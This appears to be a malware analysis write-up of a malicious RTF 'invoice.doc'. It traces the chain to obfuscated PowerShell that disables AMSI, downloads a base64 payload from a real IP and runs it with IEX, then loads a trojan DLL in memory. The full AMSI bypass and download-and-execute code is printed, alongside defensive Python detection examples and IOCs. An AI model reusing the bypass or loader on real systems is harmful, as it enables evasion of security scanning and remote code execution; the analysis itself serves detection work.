
Analysis of a malicious VBA sample in a Word document


This Wind


Introduction

A sample I saw in a group chat; I decided to take a look at it.
Sample source: https://app.any.run/tasks/9f3895b5-6ae1-4ac1-b829-b50202985e3d/#

Analysis

Opening the document in WinHex shows that, despite the .doc name, it is actually an RTF file.


Inspect the embedded objects with rtfobj from the oletools suite.


Dump the embedded VBS (-s all writes every object rtfobj finds to disk; here that is a single Client.vbs):

rtfobj -s all invoice.doc
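To show what rtfobj is doing under the hood, here is an added Python example (mine, not from the post or from oletools) that builds a minimal RTF carrying one OLE 1.0 "Package" object, pulls the {\*\objdata} group back out, hex-decodes it and parses the OLE 1.0 header down to the embedded payload. The script text and the RTF are constructed for the example. A real Package object additionally wraps the file in its own Package structure (filename, path, data), which rtfobj also unpacks and which is skipped here.

```python
import re
import struct

# Constructed inputs for this added example (not from the analysed invoice.doc):
# a short script standing in for the dumped Client.vbs, embedded as the native data
# of an OLE 1.0 "Package" object inside a minimal RTF.
SAMPLE_SCRIPT = b'Set o = CreateObject("WScript.Shell")\r\no.Run "powershell -nop -w hidden"\r\n'

# Magic bytes worth checking on anything pulled out of \objdata.
MAGIC = {
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE2 compound file",
    b"MZ": "PE executable / .NET assembly",
}


def _lp_ansi(s: bytes) -> bytes:
    """MS-OLEDS LengthPrefixedAnsiString: DWORD length (including NUL), bytes, NUL."""
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def build_ole1_object(class_name: bytes, native_data: bytes) -> bytes:
    """Serialise an OLE 1.0 EmbeddedObject (FormatID 2), the layout Word writes into \\objdata."""
    header = struct.pack("<II", 0x00000501, 2)                        # OLEVersion, FormatID
    header += _lp_ansi(class_name) + _lp_ansi(b"") + _lp_ansi(b"")    # ClassName, TopicName, ItemName
    return header + struct.pack("<I", len(native_data)) + native_data  # NativeDataSize, NativeData


def wrap_in_rtf(ole1: bytes) -> str:
    """Hex-encode the object and place it in an {\\*\\objdata ...} group, line-wrapped like Word does."""
    hexdata = ole1.hex()
    chunked = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return "{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata\n" + chunked + "}}}"


def extract_objdata(rtf: str) -> list:
    """Hex-decode every {\\*\\objdata ...} group; this is the first step rtfobj performs."""
    blobs = []
    for m in re.finditer(r"\{\\\*\\objdata", rtf):
        depth, start = 1, m.end()
        i = start
        while i < len(rtf) and depth:                     # find the brace that closes this group
            depth += {"{": 1, "}": -1}.get(rtf[i], 0)
            i += 1
        body = re.sub(r"\\[a-zA-Z]+-?\d* ?", "", rtf[start:i - 1])  # drop stray control words
        hexchars = re.sub(r"[^0-9a-fA-F]", "", body)                # drop whitespace and junk
        if len(hexchars) % 2:                                        # assumption: ignore a dangling nibble
            hexchars = hexchars[:-1]
        blobs.append(bytes.fromhex(hexchars))
    return blobs


def parse_ole1(blob: bytes) -> dict:
    """Walk the OLE 1.0 header and return the class name, the payload and what it looks like."""
    version, format_id = struct.unpack_from("<II", blob, 0)
    off, names = 8, []
    for _ in range(3):                                   # ClassName, TopicName, ItemName
        (n,) = struct.unpack_from("<I", blob, off)
        off += 4
        names.append(blob[off:off + n].rstrip(b"\x00"))
        off += n
    (size,) = struct.unpack_from("<I", blob, off)
    data = blob[off + 4:off + 4 + size]
    kind = next((label for magic, label in MAGIC.items() if data.startswith(magic)), "raw data / script")
    return {"version": version, "format_id": format_id,
            "class_name": names[0].decode("latin-1"), "data": data, "kind": kind}


def demo() -> dict:
    """Round trip: build the RTF, extract the object, parse it."""
    rtf = wrap_in_rtf(build_ole1_object(b"Package", SAMPLE_SCRIPT))
    return parse_ole1(extract_objdata(rtf)[0])


if __name__ == "__main__":
    r = demo()
    print(r["class_name"], r["kind"], len(r["data"]), "bytes")
```

The magic-byte check is the part to keep in mind when triaging: a "Package" class with an MZ payload is a dropped executable, an OLE2 header means a nested Office document, and anything else (as here) is usually a script that the VBA or an OLE verb will hand to wscript.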

Client.vbs: https://paste.ubuntu.com/p/v74cHNShTq/
The script as dumped is cluttered, so taking it together with the process tree app.any.run recorded, it comes down to one sentence: depending on a check it launches either wscript or PowerShell to call home.

Analysis of the PowerShell command

# the type name is concatenated so that 'AmsiUtils' never appears as a literal
$8B0111F552 = [Ref].Assembly.GetType('Sy' + 'stem.' + 'Mana' + 'gem' + 'ent' + '.Autom' + 'atio' + 'n.A' + 'm' + 'si' + 'Utils');
# each two-digit pair + 53 is one character: decodes to 'amsiInitFailed'
$835FFE1926 = '4456625220575263174452554847';
$9FE0AD5C66 = [string](0..13 | % {
    [char][int](53 + ($835FFE1926).substring(($_ * 2), 2))
}) -replace ' ';
# the binding flags 'NonPublic,Static' are assembled with .replace() and concatenation
$58FB808063 = $8B0111F552.GetField($9FE0AD5C66, 'Non^^^'.replace('^^^', 'Pub') + 'lic,S' + 'tatic');
# amsiInitFailed = $true: AMSI believes it failed to start and scans nothing further in this process
$58FB808063.SetValue($null, $true);
# prints a fixed hex marker; Write-Host returns nothing, so the variable ends up $null
($A72F9B815A = $A72F9B815A = Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');
$747586859599494838475575854949393847584855 = @(91, 82, 101, 102, 93, 46, 65, 115, 115, 101, 109, 98, 108, 121, 46, 71, 101, 116, 84, 121, 112, 101, 40, 39, 83, 121, 39, 43, 39, 115, 116, 101, 109, 46, 39, 43, 39, 77, 97, 110, 97, 39, 43, 39, 103, 101, 109, 39, 43, 39, 101, 110, 116, 39, 43, 39, 46, 65, 117, 116, 111, 109, 39, 43, 39, 97, 116, 105, 111, 39, 43, 39, 110, 46, 39, 43, 36, 40, 91, 67, 72, 65, 114, 93, 40, 57, 56, 45, 51, 51, 41, 43, 91, 99, 72, 65, 114, 93, 40, 49, 50, 52, 45, 49, 53, 41, 43, 91, 99, 104, 65, 82, 93, 40, 49, 49, 53, 41, 43, 91, 67, 72, 97, 82, 93, 40, 91, 66, 89, 116, 101, 93, 48, 120, 54, 57, 41, 41, 43, 39, 85, 116, 105, 108, 115, 39, 41, 46, 71, 101, 116, 70, 105, 101, 108, 100, 40, 36, 40, 91, 67, 104, 65, 114, 93, 40, 91, 98, 121, 116, 101, 93, 48, 120, 54, 49, 41, 43, 91, 99, 104, 97, 82, 93, 40, 91, 98, 89, 116, 69, 93, 48, 120, 54, 68, 41, 43, 91, 99, 104, 97, 114, 93, 40, 91, 98, 121, 84, 101, 93, 48, 120, 55, 51, 41, 43, 91, 99, 104, 65, 114, 93, 40, 49, 49, 48, 45, 53, 41, 43, 91, 99, 104, 65, 82, 93, 40, 91, 66, 89, 84, 69, 93, 48, 120, 52, 57, 41, 43, 91, 99, 72, 97, 82, 93, 40, 57, 54, 56, 48, 47, 56, 56, 41, 43, 91, 99, 72, 97, 82, 93, 40, 49, 48, 53, 41, 43, 91, 67, 104, 97, 114, 93, 40, 91, 98, 89, 116, 101, 93, 48, 120, 55, 52, 41, 43, 91, 67, 104, 97, 114, 93, 40, 91, 66, 89, 84, 69, 93, 48, 120, 52, 54, 41, 43, 91, 99, 104, 97, 114, 93, 40, 49, 52, 56, 45, 53, 49, 41, 43, 91, 99, 72, 65, 82, 93, 40, 57, 53, 53, 53, 47, 57, 49, 41, 43, 91, 67, 104, 65, 82, 93, 40, 49, 48, 56, 41, 43, 91, 67, 104, 65, 114, 93, 40, 54, 50, 54, 50, 47, 54, 50, 41, 43, 91, 67, 104, 65, 82, 93, 40, 91, 98, 89, 84, 69, 93, 48, 120, 54, 52, 41, 41, 44, 39, 78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 83, 116, 97, 116, 105, 99, 39, 41, 46, 83, 101, 116, 86, 97, 108, 117, 101, 40, 36, 110, 117, 108, 108, 44, 36, 116, 114, 117, 101, 41, 59, 40, 36, 49, 68, 55, 56, 53, 70, 50, 56, 53, 67, 61, 36, 49, 68, 55, 56, 53, 70, 50, 56, 53, 67, 61, 87, 
114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 69, 67, 52, 65, 65, 66, 53, 56, 48, 56, 50, 50, 51, 69, 66, 55, 50, 50, 70, 57, 67, 50, 48, 54, 51, 69, 68, 48, 53, 54, 54, 54, 53, 65, 65, 56, 48, 65, 67, 53, 54, 53, 56, 70, 57, 68, 48, 54, 56, 49, 53, 55, 50, 48, 55, 53, 57, 67, 51, 69, 66, 52, 67, 52, 66, 55, 48, 54, 53, 55, 50, 52, 67, 51, 68, 69, 70, 65, 54, 51, 68, 69, 66, 53, 56, 70, 67, 51, 70, 65, 57, 68, 50, 50, 49, 50, 49, 54, 55, 52, 39, 41, 59, 100, 111, 32, 123, 36, 112, 105, 110, 103, 32, 61, 32, 116, 101, 115, 116, 45, 99, 111, 110, 110, 101, 99, 116, 105, 111, 110, 32, 45, 99, 111, 109, 112, 32, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 32, 45, 99, 111, 117, 110, 116, 32, 49, 32, 45, 81, 117, 105, 101, 116, 125, 32, 117, 110, 116, 105, 108, 32, 40, 36, 112, 105, 110, 103, 41, 59, 36, 66, 54, 55, 54, 56, 48, 65, 69, 49, 54, 32, 61, 32, 91, 69, 110, 117, 109, 93, 58, 58, 84, 111, 79, 98, 106, 101, 99, 116, 40, 91, 83, 121, 115, 116, 101, 109, 46, 78, 101, 116, 46, 83, 101, 99, 117, 114, 105, 116, 121, 80, 114, 111, 116, 111, 99, 111, 108, 84, 121, 112, 101, 93, 44, 32, 51, 48, 55, 50, 41, 59, 91, 83, 121, 115, 116, 101, 109, 46, 78, 101, 116, 46, 83, 101, 114, 118, 105, 99, 101, 80, 111, 105, 110, 116, 77, 97, 110, 97, 103, 101, 114, 93, 58, 58, 83, 101, 99, 117, 114, 105, 116, 121, 80, 114, 111, 116, 111, 99, 111, 108, 32, 61, 32, 36, 66, 54, 55, 54, 56, 48, 65, 69, 49, 54, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 61, 32, 78, 101, 119, 45, 79, 98, 106, 101, 99, 116, 32, 45, 67, 111, 109, 32, 77, 105, 99, 114, 111, 115, 111, 102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 111, 112, 101, 110, 40, 39, 71, 69, 84, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 49, 48, 56, 46, 54, 49, 46, 49, 54, 54, 46, 49, 49, 47, 109, 47, 102, 105, 110, 101, 46, 106, 112, 103, 39, 44, 36, 102, 97, 108, 115, 101, 41, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 115, 101, 110, 100, 40, 41, 59, 36, 54, 55, 
52, 69, 49, 54, 53, 67, 56, 51, 61, 91, 84, 101, 120, 116, 46, 69, 110, 99, 111, 100, 105, 110, 103, 93, 58, 58, 39, 85, 84, 70, 56, 39, 46, 39, 71, 101, 116, 83, 116, 114, 105, 110, 103, 39, 40, 91, 67, 111, 110, 118, 101, 114, 116, 93, 58, 58, 39, 70, 114, 111, 109, 66, 97, 115, 101, 54, 52, 83, 116, 114, 105, 110, 103, 39, 40, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 114, 101, 115, 112, 111, 110, 115, 101, 84, 101, 120, 116, 41, 41, 124, 73, 96, 69, 96, 88);
[System.Text.Encoding]::ASCII.GetString($747586859599494838475575854949393847584855)|I`E`X

 

1. Uses reflection to reach System.Management.Automation.AmsiUtils and sets its non-public static field amsiInitFailed (the name is decoded from the digit string, two digits plus 53 per character) to $true. AMSI then believes it failed to initialise and stops scanning script content in this process: an AMSI bypass, not a "null" detection statement.
2. Decodes the byte array as ASCII and runs the result through IEX (Invoke-Expression, written as I`E`X so the token does not match a plain string search).

Deobfuscated second stage

# same AMSI bypass; type and field names are now built from [char] arithmetic: 'Amsi' and 'amsiInitFailed'
[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.'+$([CHAr](98-33)+[cHAr](124-15)+[chAR](115)+[CHaR]([BYte]0x69))+'Utils').GetField($([ChAr]([byte]0x61)+[chaR]([bYtE]0x6D)+[char]([byTe]0x73)+[chAr](110-5)+[chAR]([BYTE]0x49)+[cHaR](9680/88)+[cHaR](105)+[Char]([bYte]0x74)+[Char]([BYTE]0x46)+[char](148-51)+[cHAR](9555/91)+[ChAR](108)+[ChAr](6262/62)+[ChAR]([bYTE]0x64)),'NonPublic,Static').SetValue($null,$true);
($1D785F285C=$1D785F285C=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping); # loop until google.com answers a ping
$B67680AE16 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);   # 3072 = Tls12
[System.Net.ServicePointManager]::SecurityProtocol = $B67680AE16;
$E7DEA8DB03= New-Object -Com Microsoft.XMLHTTP;
$E7DEA8DB03.open('GET','http://108.61.166.11/m/fine.jpg',$false);
$E7DEA8DB03.send();
$674E165C83=[Text.Encoding]::'UTF8'.'GetString'([Convert]::'FromBase64String'($E7DEA8DB03.responseText))|I`E`X # download, base64-decode, execute

1. Same AMSI bypass as in the first stage (System.Management.Automation.AmsiUtils.amsiInitFailed set to $true via reflection), this time with the type and field names assembled from [char] arithmetic instead of the digit string.
2. Pings google.com once with Test-Connection and loops until the ping succeeds. This is a connectivity check that doubles as a sandbox check: an isolated analysis VM never gets past this loop.
3. Forces TLS 1.2 (SecurityProtocolType 3072), fetches http://108.61.166.11/m/fine.jpg through a Microsoft.XMLHTTP COM object rather than System.Net.WebClient, base64-decodes the response body and runs it with IEX.
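Both layers lean on the same handful of tricks: the digit-pair field name, an ASCII code-point array, 'a'+'b' concatenation, [char] arithmetic, $() subexpressions, .replace() and backtick splitting. The following added Python example (mine, not the post's) reimplements them as a normaliser and then runs simple indicator matching over a few script-block lines, three copied from the scripts above and one constructed benign line, to show that indicators such as AmsiUtils only match after normalisation. The escape-character handling for backticks and the integer-only [char] arithmetic are simplifying assumptions sufficient for this sample.

```python
import re

# Added example reimplementing the obfuscation tricks seen in both PowerShell layers of
# this sample, followed by indicator matching on the normalised text. SAMPLE_LINES mixes
# lines copied from the post's scripts with one constructed benign line.


def decode_offset_pairs(digits: str, offset: int = 53) -> str:
    """Layer 1: each pair of decimal digits plus 53 is one character of the field name."""
    return "".join(chr(offset + int(digits[i:i + 2])) for i in range(0, len(digits), 2))


def decode_byte_array(values) -> str:
    """Layer 1: the @(91, 82, ...) array is plain ASCII code points handed to IEX."""
    return bytes(values).decode("ascii")


_CHAR = re.compile(r"\[char\]\(\s*(?:\[byte\])?\s*([0-9a-fx]+)\s*(?:([-+*/])\s*(\d+))?\s*\)", re.I)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_SUBEXPR = re.compile(r"\$\('([^']*)'\)")
_REPLACE = re.compile(r"'([^']*)'\.replace\('([^']*)',\s*'([^']*)'\)", re.I)


def _char(m):
    """[char](98-33), [cHaR](9680/88), [CHaR]([BYte]0x69) -> quoted one-character string."""
    a = int(m.group(1), 0)                       # decimal or 0x.. literal
    if m.group(2):
        b = int(m.group(3))
        a = {"+": a + b, "-": a - b, "*": a * b, "/": a // b}[m.group(2)]
    return "'" + chr(a) + "'"


def normalize(line: str) -> str:
    """Resolve [char] arithmetic, 'a'+'b', $('x'), 'x'.replace() and backtick splitting."""
    # I`E`X -> IEX; assumption: backticks before real escape letters (`n, `t, ...) are left alone
    line = re.sub(r"`([^0abefnrtuv`])", r"\1", line)
    prev = None
    while prev != line:                           # iterate: each rule exposes work for the next
        prev = line
        line = _CHAR.sub(_char, line)
        line = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", line)
        line = _SUBEXPR.sub(r"'\1'", line)
        line = _REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", line)
    return line


INDICATORS = {
    "amsi-bypass": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "reflection-nonpublic": re.compile(r"GetField\(.*NonPublic", re.I),
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
}

SAMPLE_LINES = [
    # constructed benign line
    r"Get-ChildItem C:\Users | Select-Object Name",
    # copied from the post's second stage
    r"[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.'+$([CHAr](98-33)+[cHAr](124-15)+[chAR](115)+[CHaR]([BYte]0x69))+'Utils').GetField($([ChAr]([byte]0x61)+[chaR]([bYtE]0x6D)+[char]([byTe]0x73)+[chAr](110-5)+[chAR]([BYTE]0x49)+[cHaR](9680/88)+[cHaR](105)+[Char]([bYte]0x74)+[Char]([BYTE]0x46)+[char](148-51)+[cHAR](9555/91)+[ChAR](108)+[ChAr](6262/62)+[ChAR]([bYTE]0x64)),'NonPublic,Static').SetValue($null,$true);",
    r"$674E165C83=[Text.Encoding]::'UTF8'.'GetString'([Convert]::'FromBase64String'($E7DEA8DB03.responseText))|I`E`X",
    # copied from the post's first stage
    r"$58FB808063 = $8B0111F552.GetField($9FE0AD5C66, 'Non^^^'.replace('^^^', 'Pub') + 'lic,S' + 'tatic');",
]


def scan(lines):
    """Per line: which indicators fire on the raw text, and which fire after normalisation."""
    out = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        out.append({
            "line": n,
            "raw_hits": sorted(k for k, rx in INDICATORS.items() if rx.search(raw)),
            "normalized_hits": sorted(k for k, rx in INDICATORS.items() if rx.search(norm)),
        })
    return out


if __name__ == "__main__":
    print(decode_offset_pairs("4456625220575263174452554847"))
    for r in scan(SAMPLE_LINES):
        print(r)
```

The raw/normalised split is the practical lesson: a rule that looks for the literal string AmsiUtils in script-block logs sees neither layer of this sample, while the same rule on the normalised text catches both, and the .replace()/concatenation tricks around 'NonPublic,Static' fall to the same pass.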

fine.jpg

Despite the extension the file is not an image but a base64 blob. Decoding it gives the next PowerShell stage, which does the following:


1. As before, bypasses AMSI by setting System.Management.Automation.AmsiUtils.amsiInitFailed to $true.
2. Replaces the @00 markers in an embedded hex string with 0x to rebuild a byte array.
3. Hands the bytes to [System.Reflection.Assembly]::Load, which (per the Microsoft docs) loads an assembly from a COFF-based image containing an emitted assembly into the caller's application domain, so the DLL never touches disk.
4. Loads the DLL held in the IMAGE_NT_HEADERS variable that way and calls SplitUnquoted in its Quoting class, passing $ZOIOXMAUI??KDWXAMKYEC as the argument.
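As an added example (mine, not the post's code), the following Python rebuilds the byte array from the @00-prefixed hex text and reads the PE headers just far enough to confirm the blob is a managed DLL before it goes to Assembly.Load. The per-byte "@00XX" layout is an assumption drawn from the post's note that the script replaces @00 with 0x; the PE image is constructed in memory and is not the DLL from fine.jpg.

```python
import re
import struct

# Added example, not the post's code. "@00XX" per byte is an assumption from the post's
# description of the .replace('@00','0x') step; build_min_pe() fabricates the test image.

CLR_DIR_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-zero size means a .NET image


def at00_to_bytes(text: str) -> bytes:
    """'@004D@005A...' -> b'MZ...': what the script's .replace('@00','0x') plus byte cast achieves."""
    return bytes(int(h, 16) for h in re.findall(r"@00([0-9A-Fa-f]{2})", text))


def bytes_to_at00(data: bytes) -> str:
    """Inverse transform, used only to fabricate the example input."""
    return "".join("@00%02X" % b for b in data)


def build_min_pe(managed: bool) -> bytes:
    """Smallest PE32 header set: DOS header, PE signature, COFF header, optional header, 16 data dirs."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                  # e_lfanew at 0x3C
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, 1 section, DLL
    opt = struct.pack("<H", 0x10B) + b"\x00" * 90 + struct.pack("<I", 16)  # Magic ... NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    if managed:
        dirs[CLR_DIR_INDEX] = (0x2008, 72)                                  # RVA/size of IMAGE_COR20_HEADER
    return dos + coff + opt + b"".join(struct.pack("<II", rva, size) for rva, size in dirs)


def pe_info(data: bytes) -> dict:
    """Read just enough of the headers to say whether this is a managed (.NET) image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image: missing PE signature")
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", data, opt)
    pe32plus = magic == 0x20B
    dirs = opt + (112 if pe32plus else 96)                # data directories start here
    (ndirs,) = struct.unpack_from("<I", data, dirs - 4)   # NumberOfRvaAndSizes sits just before them
    clr_rva = clr_size = 0
    if ndirs > CLR_DIR_INDEX:
        clr_rva, clr_size = struct.unpack_from("<II", data, dirs + CLR_DIR_INDEX * 8)
    return {"machine": machine, "sections": nsections, "pe32plus": pe32plus,
            "dll": bool(characteristics & 0x2000), "clr_header_rva": clr_rva,
            "is_managed": clr_size != 0}


def demo() -> dict:
    """Round trip: fabricate the @00 text, rebuild the bytes, inspect the headers."""
    return pe_info(at00_to_bytes(bytes_to_at00(build_min_pe(managed=True))))


if __name__ == "__main__":
    print(demo())
```

Because Assembly.Load(byte[]) never writes the DLL to disk, file scanning does not see it; the two places that still record it are PowerShell script block logging (Event ID 4104, which the amsiInitFailed trick does not switch off) and the .NET runtime's assembly-load events, where a module with no backing file path stands out.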

Extracted DLL

According to the tags app.any.run assigns, it belongs to a trojan family.

The SplitUnquoted function of the Quoting class is the entry point the PowerShell stage calls.

IOCs:
Main object: mal0129-01.zip
  sha256 00789a46bbe5d6537f0b2ebb23a006d51c18752f13c1fac475f39b7e8e0431a4
  sha1   3e70416110eca3a4dda6a28e929413193fa008b4
  md5    e26e82db7083a2559ecfe147c7696cb9
Connections:
  ip  108.61.166.11
HTTP/HTTPS requests:
  url http://108.61.166.11/m/fine.jpg

ThreatBook community (微步社区) lookup

[screenshot]

References

https://app.any.run/tasks/9f3895b5-6ae1-4ac1-b829-b50202985e3d/#
https://docs.microsoft.com/zh-cn/dotnet/api/system.reflection.assembly.load?view=net-5.0
https://blog.csdn.net/csdndscs/article/details/103946972
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
